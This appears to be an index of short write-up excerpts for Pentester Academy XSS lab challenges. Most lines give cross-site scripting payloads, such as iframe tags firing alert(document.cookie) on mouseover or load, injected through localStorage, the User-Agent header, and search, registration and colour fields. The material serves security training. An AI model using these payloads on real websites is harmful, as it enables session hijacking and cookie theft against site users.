[Pentester Academy] Web Application Security Challenge 34
Modified info value in localstorage to </div><iframe src="" onload=alert(1)><div>
Modified info value in localstorage to </div><iframe src="" onload=alert(1)><div>
I found my user-agent string in 8th line of Log review ….so i inserted <iframe src="" onmouseover="alert(document.cookie)">; in user-agent header …
Insert </h3><iframe src="" onmouseover="alert(document.cookie)"><h3> in the User Registration Field.
Insert <iframe onmouseover="alert(document.cookie)"> in the search field.
Following Web Application Uses console.log(input) ,so i inserted alert(document.cookie) in the input field.
Inset "><iframe src="" onmouseover="alert(document.cookie)"><xss input="" in the Color Field
In this Challenge there is an extra time_input field in the POST request Body.So i modified that request with time_input …
This is one of the interesting XSS challenge . In this challenge the motive was to learn that the filename …